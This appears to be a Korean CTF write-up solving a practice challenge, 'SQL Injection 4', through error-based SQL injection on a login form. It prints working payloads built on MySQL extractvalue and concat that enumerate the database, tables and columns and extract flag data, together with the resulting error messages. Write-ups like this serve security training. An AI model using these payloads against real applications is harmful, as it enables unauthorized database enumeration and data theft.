[SegFault] (SQLi) - SQL Injection 4

[SegFault] (SQLi)

SQL Injection 4

flag를 찾으세요!

문제 파악

위의 페이지에 들어가면 아래와 같은 창이 나온다.

우선 주어진 계정으로 로그인 해본다.

계정 정보 : normaltic / 1234

 

로그인 하면 다음과 같은 페이지로 넘어간다.

로그인 이후의 부분에는 딱히 입력 부분이 보이지 않는다.

그렇다면 로그인 창에서 SQL Injection이 가능한지 확인해보자.

 

SQL Injection Point

'and'1'='1을 넣어준 상태로도 정상 동작하는지 확인한다.

normaltic'and'1'='1 / 1234

위의 id / pw 로도 로그인되는지 확인한 결과 정상적으로 로그인되는 것을 확인했다.

그렇지만 여기서 로그인에 대한 결과 외에 SQL Injection 방식을 결정할 방법이 있는지 확인해야 한다.

그래서 ' 를 입력하여 ' 의 개수가 맞지 않도록 유도하여  syntax error를 발생 시켜본다.

그 결과 에러 메시지가 로그인창 하단부에 그대로 노출되는 것을 확인할 수 있었다.

이를 기반으로 Error Based SQL Injection의 진행 절차(Process)에 따라 진행한다.

---

풀이 과정 (해결 방안)

1. SQL Injection Point 찾기

위에서 Error 정보가 화면에 노출되는 것을 확인하였다.

 

2. Error를 유발하는 함수

본 문제의 경우 MySQL을 사용한다. MySQL의 에러 유발 함수는 extractvalue 이다.

 

3. 공격 Format 작성하기

' and extractvalue('1',concat(0x3a,(______))) and '1'='1

이제 위의 빈칸에 원하는 SQL 구문을 삽입하면 된다.

 

4. DB 이름 확인하기

어떤 TABLE과 COLUMN이 있는지 알아내기 위해 어떤 DB가 존재하는지 부터 확인한다.

select database()

위의 쿼리를 공격 Format에 넣어서 입렵해본다.

' and extractvalue('1',concat(0x3a,(select database()))) and '1'='1

Could not update data: XPATH syntax error: ':sqli_2_1'

그 결과 DB는 sqli_2_1임을 확인할 수 있었다.

 

5. Table 이름 확인하기

Table을 확인하기 위한 쿼리는 다음과 같다.

select table_name from information_schema.tables where table_schema = 'sqli_2_1'

그러므로 위의 쿼리를 공격 Format에 담아 입력해본다.

' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema = 'sqli_2_1'))) and '1'='1

그 결과 다음과 같은 에러가 발생하였다.

Could not update data: Subquery returns more than 1 row

에러의 내용을 확인해보면 여러행이 나오기 때문에 발생한 에러 였다.

limit을 이용하여 한줄씩만 출력해줄 필요가 있어 보인다.

그전에 TABLE의 개수를 확인해보자.

' and extractvalue('1',concat(0x3a,(select count(table_name) from information_schema.tables where table_schema = 'sqli_2_1'))) and '1'='1

그 결과는 다음과 같다.

2개의 Table이 존재하는 것을 확인하였다. 그럼 이제 limit 을 이용하여 (0~1) 확인해보자

select table_name from information_schema.tables where table_schema = 'sqli_2_1' limit 0,1

이를 공격 Format에 담아 입력해주면 다음과 같은 결과가 나온다.

flag_table 과 member 라는 TABLE이 확인되었다.

 

6. Column 이름 확인하기

우선 flag_table을 확인해보기로 한다.

일단 해당 TABLE 내부에 몇 개의 COLUMN이 있는지 확인해본다.

' and extractvalue('1',concat(0x3a,(select count(column_name) from information_schema.columns where table_name = 'flag_table'))) and '1'='1

 

그 결과 8개의 COLUMN으로 이루어진 것을 확인할 수 있었다.

limit를 이용하여 (0~7) COLUMN 이름들을 확인해보자. 사용할 쿼리는 다음과 같다.

select column_name from information_schema.columns where table_name = 'flag_table' limit 0,1

이를 공격 Format에 담아서 입력해주면 다음과 같다.

x' and extractvalue('1',concat(0x3a,(select column_name from information_schema.columns where table_name = 'flag_table' limit 0,1))) and '1'='1

Could not update data: XPATH syntax error: ':flag1'

8개의 COLUMN을 확인해본 결과는 다음과 같다.

flag1 / flag2 / flag3 / flag4 / flag5 / flag6 / flag7 / flag8

flag 1~8의 이름을 갖는 COLUMN들이 존재하는 것을 확인할 수 있었다.

 

7. Data 출력하기

그럼 이제 각 COLUMN의 DATA를 출력해보자..

select flag (1~8) from flag_table

flag1 ~ flag8에 대한 쿼리를 공격 Format에 담아 입력한 결과는 다음과 같다.

' and extractvalue('1',concat(0x3a,(select flag1 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag2 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag3 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag4 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag5 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag6 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag7 from flag_table))) and '1'='1

 

' and extractvalue('1',concat(0x3a,(select flag8 from flag_table))) and '1'='1

확인해본 결과 총 8조각으로 나누어져있는 flag 조각이 있었고 순서대로 이어붙인 결과가 flag로서 완성되었다.

결과적으로 Error Based SQLi를 통해 flag를 획득하는데 성공하였다.

---

질문 환영, 수정 및 보완에 대한 지적 환영